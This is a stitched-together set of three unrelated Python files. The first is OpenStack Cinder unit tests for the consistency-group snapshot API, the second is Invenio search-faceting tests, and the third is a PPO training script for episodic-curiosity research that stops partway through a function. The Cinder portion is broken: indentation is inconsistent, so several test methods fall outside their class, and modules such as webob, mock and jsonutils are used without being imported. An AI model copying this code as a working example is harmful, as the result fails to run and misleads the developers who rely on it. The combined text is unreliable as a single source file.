from cinder import context
from cinder import db
from cinder import exception
from cinder.group import api as groupAPI
from cinder import objects
from cinder import test
from cinder.tests.unit.api import fakes
from cinder.tests.unit import fake_constants as fake
from cinder.tests.unit import utils
import cinder.volume
class CgsnapshotsAPITestCase(test.TestCase):
"""Test Case for cgsnapshots API."""
def setUp(self):
super(CgsnapshotsAPITestCase, self).setUp()
self.volume_api = cinder.volume.API()
self.context = context.get_admin_context()
self.context.project_id = fake.PROJECT_ID
self.context.user_id = fake.USER_ID
self.user_ctxt = context.RequestContext(
fake.USER_ID, fake.PROJECT_ID, auth_token=True)
    def test_show_cgsnapshot(self):
        """GET /cgsnapshots/<id> returns the snapshot's fields."""
        # Fixtures: volume type -> group -> volume -> group snapshot ->
        # member snapshot.
        vol_type = utils.create_volume_type(context.get_admin_context(),
                                            self, name='my_vol_type')
        consistencygroup = utils.create_group(
            self.context,
            group_type_id=fake.GROUP_TYPE_ID,
            volume_type_ids=[vol_type['id']])
        volume_id = utils.create_volume(self.context,
                                        volume_type_id=vol_type['id'],
                                        group_id=consistencygroup.id)['id']
        cgsnapshot = utils.create_group_snapshot(
            self.context, group_id=consistencygroup.id,
            group_type_id=fake.GROUP_TYPE_ID,)
        snapshot_id = utils.create_snapshot(
            self.context,
            volume_type_id=vol_type['id'],
            volume_id=volume_id,
            group_snapshot_id=cgsnapshot.id)['id']
        req = webob.Request.blank('/v2/%s/cgsnapshots/%s' % (
            fake.PROJECT_ID, cgsnapshot.id))
        req.method = 'GET'
        req.headers['Content-Type'] = 'application/json'
        res = req.get_response(fakes.wsgi_app(
            fake_auth_context=self.user_ctxt))
        res_dict = jsonutils.loads(res.body)
        # Defaults supplied by utils.create_group_snapshot.
        self.assertEqual(http_client.OK, res.status_int)
        self.assertEqual('this is a test group snapshot',
                         res_dict['cgsnapshot']['description'])
        self.assertEqual('test_group_snapshot',
                         res_dict['cgsnapshot']['name'])
        self.assertEqual('creating', res_dict['cgsnapshot']['status'])
        # Tear down fixtures in reverse creation order.
        db.snapshot_destroy(context.get_admin_context(), snapshot_id)
        cgsnapshot.destroy()
        db.volume_destroy(context.get_admin_context(), volume_id)
        consistencygroup.destroy()
def test_show_cgsnapshot_with_cgsnapshot_NotFound(self):
req = webob.Request.blank('/v2/%s/cgsnapshots/%s' % (
fake.PROJECT_ID, fake.WILL_NOT_BE_FOUND_ID))
req.method = 'GET'
req.headers['Content-Type'] = 'application/json'
res = req.get_response(fakes.wsgi_app(
fake_auth_context=self.user_ctxt))
res_dict = jsonutils.loads(res.body)
self.assertEqual(http_client.NOT_FOUND, res.status_int)
self.assertEqual(http_client.NOT_FOUND,
res_dict['itemNotFound']['code'])
self.assertEqual('GroupSnapshot %s could not be found.' %
fake.WILL_NOT_BE_FOUND_ID,
res_dict['itemNotFound']['message'])
    def test_list_cgsnapshots_json(self):
        """GET /cgsnapshots lists snapshots newest-first with id/name."""
        vol_type = utils.create_volume_type(context.get_admin_context(),
                                            self, name='my_vol_type')
        consistencygroup = utils.create_group(
            self.context,
            group_type_id=fake.GROUP_TYPE_ID,
            volume_type_ids=[vol_type['id']])
        volume_id = utils.create_volume(self.context,
                                        volume_type_id=vol_type['id'],
                                        group_id=consistencygroup.id)['id']
        # Three snapshots; the API is expected to return them in
        # reverse creation order.
        cgsnapshot1 = utils.create_group_snapshot(
            self.context, group_id=consistencygroup.id,
            group_type_id=fake.GROUP_TYPE_ID,)
        cgsnapshot2 = utils.create_group_snapshot(
            self.context, group_id=consistencygroup.id,
            group_type_id=fake.GROUP_TYPE_ID,)
        cgsnapshot3 = utils.create_group_snapshot(
            self.context, group_id=consistencygroup.id,
            group_type_id=fake.GROUP_TYPE_ID,)
        req = webob.Request.blank('/v2/%s/cgsnapshots' % fake.PROJECT_ID)
        req.method = 'GET'
        req.headers['Content-Type'] = 'application/json'
        res = req.get_response(fakes.wsgi_app(
            fake_auth_context=self.user_ctxt))
        res_dict = jsonutils.loads(res.body)
        self.assertEqual(http_client.OK, res.status_int)
        self.assertEqual(cgsnapshot3.id,
                         res_dict['cgsnapshots'][0]['id'])
        self.assertEqual('test_group_snapshot',
                         res_dict['cgsnapshots'][0]['name'])
        self.assertEqual(cgsnapshot2.id,
                         res_dict['cgsnapshots'][1]['id'])
        self.assertEqual('test_group_snapshot',
                         res_dict['cgsnapshots'][1]['name'])
        self.assertEqual(cgsnapshot1.id,
                         res_dict['cgsnapshots'][2]['id'])
        self.assertEqual('test_group_snapshot',
                         res_dict['cgsnapshots'][2]['name'])
        # Tear down fixtures in reverse creation order.
        cgsnapshot3.destroy()
        cgsnapshot2.destroy()
        cgsnapshot1.destroy()
        db.volume_destroy(context.get_admin_context(), volume_id)
        consistencygroup.destroy()
    def test_list_cgsnapshots_detail_json(self):
        """GET /cgsnapshots/detail includes description and status per item."""
        vol_type = utils.create_volume_type(context.get_admin_context(),
                                            self, name='my_vol_type')
        consistencygroup = utils.create_group(
            self.context,
            group_type_id=fake.GROUP_TYPE_ID,
            volume_type_ids=[vol_type['id']])
        volume_id = utils.create_volume(self.context,
                                        volume_type_id=vol_type['id'],
                                        group_id=consistencygroup.id)['id']
        # Three snapshots; the API is expected to return them in
        # reverse creation order.
        cgsnapshot1 = utils.create_group_snapshot(
            self.context, group_id=consistencygroup.id,
            group_type_id=fake.GROUP_TYPE_ID,)
        cgsnapshot2 = utils.create_group_snapshot(
            self.context, group_id=consistencygroup.id,
            group_type_id=fake.GROUP_TYPE_ID,)
        cgsnapshot3 = utils.create_group_snapshot(
            self.context, group_id=consistencygroup.id,
            group_type_id=fake.GROUP_TYPE_ID,)
        req = webob.Request.blank('/v2/%s/cgsnapshots/detail' %
                                  fake.PROJECT_ID)
        req.method = 'GET'
        req.headers['Content-Type'] = 'application/json'
        req.headers['Accept'] = 'application/json'
        res = req.get_response(fakes.wsgi_app(
            fake_auth_context=self.user_ctxt))
        res_dict = jsonutils.loads(res.body)
        self.assertEqual(http_client.OK, res.status_int)
        self.assertEqual('this is a test group snapshot',
                         res_dict['cgsnapshots'][0]['description'])
        self.assertEqual('test_group_snapshot',
                         res_dict['cgsnapshots'][0]['name'])
        self.assertEqual(cgsnapshot3.id,
                         res_dict['cgsnapshots'][0]['id'])
        self.assertEqual('creating',
                         res_dict['cgsnapshots'][0]['status'])
        self.assertEqual('this is a test group snapshot',
                         res_dict['cgsnapshots'][1]['description'])
        self.assertEqual('test_group_snapshot',
                         res_dict['cgsnapshots'][1]['name'])
        self.assertEqual(cgsnapshot2.id,
                         res_dict['cgsnapshots'][1]['id'])
        self.assertEqual('creating',
                         res_dict['cgsnapshots'][1]['status'])
        self.assertEqual('this is a test group snapshot',
                         res_dict['cgsnapshots'][2]['description'])
        self.assertEqual('test_group_snapshot',
                         res_dict['cgsnapshots'][2]['name'])
        self.assertEqual(cgsnapshot1.id,
                         res_dict['cgsnapshots'][2]['id'])
        self.assertEqual('creating',
                         res_dict['cgsnapshots'][2]['status'])
        # Tear down fixtures in reverse creation order.
        cgsnapshot3.destroy()
        cgsnapshot2.destroy()
        cgsnapshot1.destroy()
        db.volume_destroy(context.get_admin_context(), volume_id)
        consistencygroup.destroy()
    @mock.patch(
        'cinder.api.openstack.wsgi.Controller.validate_name_and_description')
    def test_create_cgsnapshot_json(self, mock_validate):
        """POST /cgsnapshots creates a snapshot and validates its name."""
        vol_type = utils.create_volume_type(context.get_admin_context(),
                                            self, name='my_vol_type')
        consistencygroup = utils.create_group(
            self.context,
            group_type_id=fake.GROUP_TYPE_ID,
            volume_type_ids=[vol_type['id']])
        volume_id = utils.create_volume(self.context,
                                        volume_type_id=vol_type['id'],
                                        group_id=consistencygroup.id)['id']
        body = {"cgsnapshot": {"name": "cg1",
                               "description":
                               "CG Snapshot 1",
                               "consistencygroup_id": consistencygroup.id}}
        req = webob.Request.blank('/v2/%s/cgsnapshots' % fake.PROJECT_ID)
        req.method = 'POST'
        req.headers['Content-Type'] = 'application/json'
        req.body = jsonutils.dump_as_bytes(body)
        res = req.get_response(fakes.wsgi_app(
            fake_auth_context=self.user_ctxt))
        res_dict = jsonutils.loads(res.body)
        # Creation is async: 202 with an id, and the name/description
        # validator must have been invoked.
        self.assertEqual(http_client.ACCEPTED, res.status_int)
        self.assertIn('id', res_dict['cgsnapshot'])
        self.assertTrue(mock_validate.called)
        cgsnapshot = objects.GroupSnapshot.get_by_id(
            context.get_admin_context(), res_dict['cgsnapshot']['id'])
        # Tear down fixtures in reverse creation order.
        cgsnapshot.destroy()
        db.volume_destroy(context.get_admin_context(), volume_id)
        consistencygroup.destroy()
@mock.patch(
    'cinder.api.openstack.wsgi.Controller.validate_name_and_description')
def test_create_cgsnapshot_when_volume_in_error_status(self,
                                                       mock_validate):
    """Creating a cgsnapshot must fail with 400 when a member volume is in
    'error' status."""
    vol_type = utils.create_volume_type(context.get_admin_context(),
                                        self, name='my_vol_type')
    consistencygroup = utils.create_group(
        self.context,
        group_type_id=fake.GROUP_TYPE_ID,
        volume_type_ids=[vol_type['id']])
    # The member volume is deliberately created in 'error' status.
    volume_id = utils.create_volume(self.context,
                                    volume_type_id=vol_type['id'],
                                    group_id=consistencygroup.id,
                                    status='error')['id']
    body = {"cgsnapshot": {"name": "cg1",
                           "description":
                           "CG Snapshot 1",
                           "consistencygroup_id": consistencygroup.id}}
    req = webob.Request.blank('/v2/%s/cgsnapshots' % fake.PROJECT_ID)
    req.method = 'POST'
    req.headers['Content-Type'] = 'application/json'
    req.body = jsonutils.dump_as_bytes(body)
    res = req.get_response(fakes.wsgi_app(
        fake_auth_context=self.user_ctxt))
    res_dict = jsonutils.loads(res.body)
    # The API rejects the request with a specific error message.
    self.assertEqual(http_client.BAD_REQUEST, res.status_int)
    self.assertEqual(http_client.BAD_REQUEST,
                     res_dict['badRequest']['code'])
    self.assertEqual(
        "Invalid volume: The snapshot cannot be created when the volume "
        "is in error status.",
        res_dict['badRequest']['message']
    )
    self.assertTrue(mock_validate.called)
    # Clean up fixtures.
    db.volume_destroy(context.get_admin_context(), volume_id)
    consistencygroup.destroy()
def test_create_cgsnapshot_with_no_body(self):
    """A POST without a request body must yield 400 with a clear message."""
    # omit body from the request
    req = webob.Request.blank('/v2/%s/cgsnapshots' % fake.PROJECT_ID)
    req.method = 'POST'
    req.headers['Content-Type'] = 'application/json'
    req.headers['Accept'] = 'application/json'
    req.body = jsonutils.dump_as_bytes(None)

    res = req.get_response(fakes.wsgi_app(
        fake_auth_context=self.user_ctxt))
    res_dict = jsonutils.loads(res.body)

    self.assertEqual(http_client.BAD_REQUEST, res.status_int)
    self.assertEqual(http_client.BAD_REQUEST,
                     res_dict['badRequest']['code'])
    self.assertEqual("Missing required element 'cgsnapshot' in "
                     "request body.",
                     res_dict['badRequest']['message'])
@mock.patch.object(groupAPI.API, 'create_group_snapshot',
                   side_effect=exception.InvalidGroupSnapshot(
                       reason='invalid group_snapshot'))
def test_create_with_invalid_cgsnapshot(self, mock_create_cgsnapshot):
    """An InvalidGroupSnapshot error raised by the group API must map to a
    400 badRequest response."""
    vol_type = utils.create_volume_type(context.get_admin_context(),
                                        self, name='my_vol_type')
    consistencygroup = utils.create_group(
        self.context,
        group_type_id=fake.GROUP_TYPE_ID,
        volume_type_ids=[vol_type['id']])
    volume_id = utils.create_volume(self.context,
                                    volume_type_id=vol_type['id'],
                                    group_id=consistencygroup.id)['id']
    body = {"cgsnapshot": {"name": "cg1",
                           "description":
                           "CG Snapshot 1",
                           "consistencygroup_id": consistencygroup.id}}
    req = webob.Request.blank('/v2/%s/cgsnapshots' % fake.PROJECT_ID)
    req.body = jsonutils.dump_as_bytes(body)
    req.method = 'POST'
    req.headers['Content-Type'] = 'application/json'
    res = req.get_response(fakes.wsgi_app(
        fake_auth_context=self.user_ctxt))
    res_dict = jsonutils.loads(res.body)
    # The exception reason is surfaced verbatim in the error message.
    self.assertEqual(http_client.BAD_REQUEST, res.status_int)
    self.assertEqual(http_client.BAD_REQUEST,
                     res_dict['badRequest']['code'])
    self.assertEqual('Invalid GroupSnapshot: invalid group_snapshot',
                     res_dict['badRequest']['message'])
    # Clean up fixtures.
    db.volume_destroy(context.get_admin_context(), volume_id)
    consistencygroup.destroy()
@mock.patch.object(groupAPI.API, 'create_group_snapshot',
                   side_effect=exception.GroupSnapshotNotFound(
                       group_snapshot_id='invalid_id'))
def test_create_with_cgsnapshot_not_found(self, mock_create_cgsnapshot):
    """A GroupSnapshotNotFound error raised by the group API must map to a
    404 itemNotFound response."""
    vol_type = utils.create_volume_type(context.get_admin_context(),
                                        self, name='my_vol_type')
    consistencygroup = utils.create_group(
        self.context,
        group_type_id=fake.GROUP_TYPE_ID,
        volume_type_ids=[vol_type['id']])
    volume_id = utils.create_volume(self.context,
                                    volume_type_id=vol_type['id'],
                                    group_id=consistencygroup.id)['id']
    body = {"cgsnapshot": {"name": "cg1",
                           "description":
                           "CG Snapshot 1",
                           "consistencygroup_id": consistencygroup.id}}
    req = webob.Request.blank('/v2/%s/cgsnapshots' % fake.PROJECT_ID)
    req.method = 'POST'
    req.headers['Content-Type'] = 'application/json'
    req.body = jsonutils.dump_as_bytes(body)
    res = req.get_response(fakes.wsgi_app(
        fake_auth_context=self.user_ctxt))
    res_dict = jsonutils.loads(res.body)
    self.assertEqual(http_client.NOT_FOUND, res.status_int)
    self.assertEqual(http_client.NOT_FOUND,
                     res_dict['itemNotFound']['code'])
    self.assertEqual('GroupSnapshot invalid_id could not be found.',
                     res_dict['itemNotFound']['message'])
    # Clean up fixtures.
    db.volume_destroy(context.get_admin_context(), volume_id)
    consistencygroup.destroy()
def test_create_cgsnapshot_from_empty_consistencygroup(self):
    """Snapshotting a group that contains no volumes must fail with 400
    and must not leave a GroupSnapshot row behind."""
    admin_ctxt = context.get_admin_context()
    vol_type = utils.create_volume_type(admin_ctxt, self,
                                        name='my_vol_type')
    group = utils.create_group(self.context,
                               group_type_id=fake.GROUP_TYPE_ID,
                               volume_type_ids=[vol_type['id']])
    body = {"cgsnapshot": {"name": "cg1",
                           "description": "CG Snapshot 1",
                           "consistencygroup_id": group.id}}

    req = webob.Request.blank('/v2/%s/cgsnapshots' % fake.PROJECT_ID)
    req.method = 'POST'
    req.headers['Content-Type'] = 'application/json'
    req.body = jsonutils.dump_as_bytes(body)
    res = req.get_response(fakes.wsgi_app(
        fake_auth_context=self.user_ctxt))
    res_dict = jsonutils.loads(res.body)

    self.assertEqual(http_client.BAD_REQUEST, res.status_int)
    self.assertEqual(http_client.BAD_REQUEST,
                     res_dict['badRequest']['code'])
    self.assertIsNotNone(res_dict['badRequest']['message'])

    # If failed to create cgsnapshot, its DB object should not be created
    self.assertListEqual(
        [],
        list(objects.GroupSnapshotList.get_all(self.context)))
    group.destroy()
def test_delete_cgsnapshot_available(self):
    """DELETE of an 'available' cgsnapshot is accepted (202) and the
    snapshot transitions to 'deleting'."""
    admin_ctxt = context.get_admin_context()
    vol_type = utils.create_volume_type(admin_ctxt, self,
                                        name='my_vol_type')
    group = utils.create_group(self.context,
                               group_type_id=fake.GROUP_TYPE_ID,
                               volume_type_ids=[vol_type['id']])
    volume_id = utils.create_volume(self.context,
                                    volume_type_id=vol_type['id'],
                                    group_id=group.id)['id']
    snapshot = utils.create_group_snapshot(
        self.context, group_id=group.id,
        group_type_id=fake.GROUP_TYPE_ID,
        status='available')

    req = webob.Request.blank('/v2/%s/cgsnapshots/%s' %
                              (fake.PROJECT_ID, snapshot.id))
    req.method = 'DELETE'
    req.headers['Content-Type'] = 'application/json'
    res = req.get_response(fakes.wsgi_app(
        fake_auth_context=self.user_ctxt))

    # Re-read the snapshot to observe the status change.
    refreshed = objects.GroupSnapshot.get_by_id(self.context,
                                                snapshot.id)
    self.assertEqual(http_client.ACCEPTED, res.status_int)
    self.assertEqual('deleting', refreshed.status)

    refreshed.destroy()
    db.volume_destroy(admin_ctxt, volume_id)
    group.destroy()
def test_delete_cgsnapshot_available_used_as_source(self):
    """Deleting a cgsnapshot that is the source of another group must be
    rejected with 400 and leave the snapshot 'available'."""
    vol_type = utils.create_volume_type(context.get_admin_context(),
                                        self, name='my_vol_type')
    consistencygroup = utils.create_group(
        self.context,
        group_type_id=fake.GROUP_TYPE_ID,
        volume_type_ids=[vol_type['id']])
    volume_id = utils.create_volume(self.context,
                                    volume_type_id=vol_type['id'],
                                    group_id=
                                    consistencygroup.id)['id']
    cgsnapshot = utils.create_group_snapshot(
        self.context, group_id=consistencygroup.id,
        group_type_id=fake.GROUP_TYPE_ID,
        status='available')
    # A second group created from the snapshot keeps it "in use".
    cg2 = utils.create_consistencygroup(
        self.context, status='creating',
        group_snapshot_id=cgsnapshot.id,
        group_type_id=fake.GROUP_TYPE_ID)
    # Consistency fix: use fake.PROJECT_ID and an authenticated request
    # like every sibling test in this file, instead of the hardcoded
    # 'fake' project and an unauthenticated wsgi_app().
    req = webob.Request.blank('/v2/%s/cgsnapshots/%s' %
                              (fake.PROJECT_ID, cgsnapshot.id))
    req.method = 'DELETE'
    req.headers['Content-Type'] = 'application/json'
    res = req.get_response(fakes.wsgi_app(
        fake_auth_context=self.user_ctxt))
    cgsnapshot = objects.GroupSnapshot.get_by_id(self.context,
                                                 cgsnapshot.id)
    self.assertEqual(http_client.BAD_REQUEST, res.status_int)
    # The snapshot must remain untouched.
    self.assertEqual('available', cgsnapshot.status)
    cgsnapshot.destroy()
    db.volume_destroy(context.get_admin_context(), volume_id)
    consistencygroup.destroy()
    cg2.destroy()
def test_delete_cgsnapshot_with_cgsnapshot_NotFound(self):
    """DELETE of a nonexistent cgsnapshot id returns 404 itemNotFound."""
    url = '/v2/%s/cgsnapshots/%s' % (fake.PROJECT_ID,
                                     fake.WILL_NOT_BE_FOUND_ID)
    req = webob.Request.blank(url)
    req.method = 'DELETE'
    req.headers['Content-Type'] = 'application/json'

    res = req.get_response(fakes.wsgi_app(
        fake_auth_context=self.user_ctxt))
    res_dict = jsonutils.loads(res.body)

    self.assertEqual(http_client.NOT_FOUND, res.status_int)
    self.assertEqual(http_client.NOT_FOUND,
                     res_dict['itemNotFound']['code'])
    self.assertEqual('GroupSnapshot %s could not be found.' %
                     fake.WILL_NOT_BE_FOUND_ID,
                     res_dict['itemNotFound']['message'])
def test_delete_cgsnapshot_with_invalid_cgsnapshot(self):
    """Deleting a cgsnapshot in an invalid status must fail with 400."""
    vol_type = utils.create_volume_type(context.get_admin_context(),
                                        self, name='my_vol_type')
    consistencygroup = utils.create_group(
        self.context,
        group_type_id=fake.GROUP_TYPE_ID,
        volume_type_ids=[vol_type['id']])
    volume_id = utils.create_volume(self.context,
                                    volume_type_id=vol_type['id'],
                                    group_id=
                                    consistencygroup.id)['id']
    # The snapshot is deliberately created with an invalid status.
    cgsnapshot = utils.create_group_snapshot(
        self.context, group_id=consistencygroup.id,
        group_type_id=fake.GROUP_TYPE_ID,
        status='invalid')
    req = webob.Request.blank('/v2/%s/cgsnapshots/%s' % (
        fake.PROJECT_ID, cgsnapshot.id))
    req.method = 'DELETE'
    req.headers['Content-Type'] = 'application/json'
    res = req.get_response(fakes.wsgi_app(
        fake_auth_context=self.user_ctxt))
    res_dict = jsonutils.loads(res.body)
    self.assertEqual(http_client.BAD_REQUEST, res.status_int)
    self.assertEqual(http_client.BAD_REQUEST,
                     res_dict['badRequest']['code'])
    self.assertIsNotNone(res_dict['badRequest']['message'])
    # Clean up fixtures.
    cgsnapshot.destroy()
    db.volume_destroy(context.get_admin_context(), volume_id)
    consistencygroup.destroy()
@mock.patch('cinder.group.API.delete_group_snapshot')
def test_delete_cgsnapshot_delete_policy_not_auth(self, mock_delete):
    """A PolicyNotAuthorized error from the group API must surface as a
    'forbidden' response."""
    vol_type = utils.create_volume_type(context.get_admin_context(),
                                        self, name='my_vol_type')
    consistencygroup = utils.create_group(
        self.context,
        group_type_id=fake.GROUP_TYPE_ID,
        volume_type_ids=[vol_type['id']])
    volume_id = utils.create_volume(self.context,
                                    volume_type_id=vol_type['id'],
                                    group_id=
                                    consistencygroup.id)['id']
    cgsnapshot = utils.create_group_snapshot(
        self.context, group_id=consistencygroup.id,
        group_type_id=fake.GROUP_TYPE_ID,
        status='available')
    # The mocked delete raises the policy error.
    mock_delete.side_effect = exception.PolicyNotAuthorized(
        message='PolicyNotAuthorized')
    req = webob.Request.blank('/v2/%s/cgsnapshots/%s' %
                              (fake.PROJECT_ID, cgsnapshot.id))
    req.method = 'DELETE'
    req.headers['Content-Type'] = 'application/json'
    res = req.get_response(fakes.wsgi_app(
        fake_auth_context=self.user_ctxt))
    res_dict = jsonutils.loads(res.body)
    self.assertEqual('PolicyNotAuthorized',
                     res_dict['forbidden']['message'])
    # Clean up fixtures.
    cgsnapshot.destroy()
    db.volume_destroy(context.get_admin_context(), volume_id)
    consistencygroup.destroy()
|
<filename>tests/resources/test_resource_faceting.py
# -*- coding: utf-8 -*-
#
# Copyright (C) 2020 CERN.
# Copyright (C) 2020 Northwestern University.
#
# Invenio-Records-Resources is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see LICENSE file for more
# details.
"""Test faceting."""
import pytest
from mock_module.api import Record
from mock_module.config import ServiceConfig
from invenio_records_resources.services import RecordService
# 2 things to test
# 1- results are aggregated / post_filtered
# 2- links are generated
@pytest.fixture(scope="module")
def three_indexed_records(app, identity_simple, es):
# NOTE: es is used (and not es_clear) here because all tests
# assume 3 records have been indexed and NO tests in this module
# adds/deletes any.
service = RecordService(ServiceConfig)
def _create(metadata):
data = {
'metadata': {
'title': 'Test',
**metadata
},
}
service.create(identity_simple, data)
_create({"title": "Record 1", "type": {"type": "A", "subtype": "AA"}})
_create({"title": "Record 2", "type": {"type": "A", "subtype": "AB"}})
_create({"title": "Record 3", "type": {"type": "B"}})
Record.index.refresh()
#
# 1- results are aggregated / post_filtered
#
def test_aggregating(client, headers, three_indexed_records):
    """An unfiltered search returns nested type/subtype aggregations
    covering all three indexed records."""
    response = client.get("/mocks", headers=headers)
    response_aggs = response.json["aggregations"]

    # Two records of type A (subtypes AA and AB), one of type B (no subtype).
    expected_aggs = {
        "type": {
            "buckets": [
                {
                    "doc_count": 2,
                    "key": "A",
                    "subtype": {
                        "buckets": [
                            {
                                "doc_count": 1,
                                "key": "AA"
                            },
                            {
                                "doc_count": 1,
                                "key": "AB"
                            }
                        ],
                        'doc_count_error_upper_bound': 0,
                        'sum_other_doc_count': 0
                    }
                },
                {
                    "doc_count": 1,
                    "key": "B",
                    "subtype": {
                        "buckets": [],
                        'doc_count_error_upper_bound': 0,
                        'sum_other_doc_count': 0
                    }
                }
            ],
            'doc_count_error_upper_bound': 0,
            'sum_other_doc_count': 0,
        }
    }
    assert expected_aggs == response_aggs
def test_post_filtering(client, headers, three_indexed_records):
    """A facet filter (?type=A) narrows the hits but leaves the
    aggregations unchanged (post-filtering)."""
    response = client.get("/mocks?type=A", headers=headers)
    assert response.status_code == 200

    # Test aggregation is the same
    response_aggs = response.json["aggregations"]
    expected_aggs = {
        "type": {
            "buckets": [
                {
                    "doc_count": 2,
                    "key": "A",
                    "subtype": {
                        "buckets": [
                            {
                                "doc_count": 1,
                                "key": "AA"
                            },
                            {
                                "doc_count": 1,
                                "key": "AB"
                            }
                        ],
                        'doc_count_error_upper_bound': 0,
                        'sum_other_doc_count': 0
                    }
                },
                {
                    "doc_count": 1,
                    "key": "B",
                    "subtype": {
                        "buckets": [],
                        'doc_count_error_upper_bound': 0,
                        'sum_other_doc_count': 0
                    }
                }
            ],
            'doc_count_error_upper_bound': 0,
            'sum_other_doc_count': 0,
        }
    }
    assert expected_aggs == response_aggs

    # Test hits are filtered
    response_hits = response.json["hits"]["hits"]
    assert 2 == len(response_hits)
    assert set(["Record 1", "Record 2"]) == set(
        [h["metadata"]["title"] for h in response_hits]
    )
#
# 2- links are generated
#
def test_links_keep_facets(client, headers, three_indexed_records):
    """Facet values must be propagated, URL-encoded, into the self link."""
    response = client.get("/mocks?type=A**B", headers=headers)
    links = response.json["links"]
    # '**' must round-trip as %2A%2A in the generated self link.
    expected = {
        "self": (
            "https://127.0.0.1:5000/api/mocks?"
            "page=1&size=25&sort=newest&type=A%2A%2AB"
        ),
    }
    for name in expected:
        assert links[name] == expected[name]
def test_links_keep_repeated_facets(client, headers, three_indexed_records):
    """Repeated values of one facet must appear in both self and next links."""
    response = client.get(
        "/mocks?size=1&type=B&type=A",
        headers=headers
    )
    links = response.json["links"]
    expected = {
        "self": (
            "https://127.0.0.1:5000/api/mocks?page=1&size=1&sort=newest"
            "&type=B&type=A"
        ),
        "next": (
            "https://127.0.0.1:5000/api/mocks?page=2&size=1&sort=newest"
            "&type=B&type=A"
        ),
    }
    for name in expected:
        assert links[name] == expected[name]
|
<reponame>cclauss/episodic-curiosity<filename>episodic_curiosity/train_policy.py
# coding=utf-8
# Copyright 2019 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Main file for training policies.
Many hyperparameters need to be passed through gin flags.
Consider using scripts/launcher_script.py to invoke train_policy with the
right hyperparameters and flags.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tempfile
import time
from absl import flags
from episodic_curiosity import env_factory
from episodic_curiosity import eval_policy
from episodic_curiosity import utils
from third_party.baselines import logger
from third_party.baselines.ppo2 import policies
from third_party.baselines.ppo2 import ppo2
import gin
import tensorflow as tf
# --- Run/environment configuration ------------------------------------------
flags.DEFINE_string('workdir', None,
                    'Root directory for writing logs/summaries/checkpoints.')
flags.DEFINE_string('env_name', 'CartPole-v0', 'What environment to run')
flags.DEFINE_string('policy_architecture', 'cnn',
                    'What model architecture to use')
flags.DEFINE_string('r_checkpoint', '', 'Location of the R-network checkpoint')
flags.DEFINE_integer('num_env', 12, 'Number of environment copies to run in '
                     'subprocesses.')
flags.DEFINE_string('dmlab_homepath', '', '')
flags.DEFINE_integer('num_timesteps', 10000000, 'Number of frames to run '
                     'training for.')
flags.DEFINE_string('action_set', '',
                    '(small|nofire|) - which action set to use')
# --- Pathak-style curiosity options -----------------------------------------
flags.DEFINE_bool('use_curiosity', False,
                  'Whether to enable Pathak\'s curiosity')
flags.DEFINE_bool('random_state_predictor', False,
                  'Whether to use random state predictor for Pathak\'s '
                  'curiosity')
flags.DEFINE_float('curiosity_strength', 0.01,
                   'Strength of the intrinsic reward in Pathak\'s algorithm.')
flags.DEFINE_float('forward_inverse_ratio', 0.2,
                   'Weighting of forward vs inverse loss in Pathak\'s '
                   'algorithm')
flags.DEFINE_float('curiosity_loss_strength', 10,
                   'Weight of the curiosity loss in Pathak\'s algorithm.')
# --- Gin configuration ------------------------------------------------------
# pylint: disable=g-inconsistent-quotes
flags.DEFINE_multi_string(
    'gin_files', [], 'List of paths to gin configuration files')
flags.DEFINE_multi_string(
    'gin_bindings', [],
    'Gin bindings to override the values set in the config files '
    '(e.g. "DQNAgent.epsilon_train=0.1",'
    ' "create_environment.game_name="Pong"").')
# pylint: enable=g-inconsistent-quotes

FLAGS = flags.FLAGS
def get_environment(env_name):
  """Create the train/valid/test environments for a prefixed env name.

  The prefix ('dmlab:', 'atari:' or 'parkour:') selects the engine; the
  remainder of the name is the level/game. Raises ValueError for any
  unrecognized prefix.
  """
  if env_name.startswith('dmlab:'):
    # DMLab additionally needs the homepath and the action set.
    return env_factory.create_environments(
        env_name[len('dmlab:'):],
        FLAGS.num_env,
        FLAGS.r_checkpoint,
        FLAGS.dmlab_homepath,
        action_set=FLAGS.action_set,
        r_network_weights_store_path=FLAGS.workdir)
  if env_name.startswith('atari:'):
    return env_factory.create_environments(
        env_name[len('atari:'):],
        FLAGS.num_env,
        FLAGS.r_checkpoint,
        environment_engine='atari',
        r_network_weights_store_path=FLAGS.workdir)
  if env_name.startswith('parkour:'):
    return env_factory.create_environments(
        env_name[len('parkour:'):],
        FLAGS.num_env,
        FLAGS.r_checkpoint,
        environment_engine='parkour',
        r_network_weights_store_path=FLAGS.workdir)
  raise ValueError('Unknown environment: {}'.format(env_name))
@gin.configurable
def train(workdir, env_name, num_timesteps,
          nsteps=256,
          nminibatches=4,
          noptepochs=4,
          learning_rate=2.5e-4,
          ent_coef=0.01):
  """Runs PPO training.

  Args:
    workdir: where to store experiment results/logs
    env_name: the name of the environment to run
    num_timesteps: for how many timesteps to run training
    nsteps: Number of consecutive environment steps to use during training.
    nminibatches: Minibatch size.
    noptepochs: Number of optimization epochs.
    learning_rate: Initial learning rate.
    ent_coef: Entropy coefficient.
  """
  # Measurement series may be None; the callbacks below guard for that.
  train_measurements = utils.create_measurement_series(workdir, 'reward_train')
  valid_measurements = utils.create_measurement_series(workdir, 'reward_valid')
  test_measurements = utils.create_measurement_series(workdir, 'reward_test')

  def measurement_callback(unused_eplenmean, eprewmean, global_step_val):
    # Records training reward at each PPO logging step.
    if train_measurements:
      train_measurements.create_measurement(
          objective_value=eprewmean, step=global_step_val)

  def eval_callback_on_valid(eprewmean, global_step_val):
    if valid_measurements:
      valid_measurements.create_measurement(
          objective_value=eprewmean, step=global_step_val)

  def eval_callback_on_test(eprewmean, global_step_val):
    if test_measurements:
      test_measurements.create_measurement(
          objective_value=eprewmean, step=global_step_val)

  logger_dir = workdir
  logger.configure(logger_dir)
  env, valid_env, test_env = get_environment(env_name)
  # The Ant/parkour env skips validation and uses constant lr/cliprange.
  is_ant = env_name.startswith('parkour:')
  # Validation metric.
  policy_evaluator_on_valid = eval_policy.PolicyEvaluator(
      valid_env,
      metric_callback=eval_callback_on_valid,
      video_filename=None)
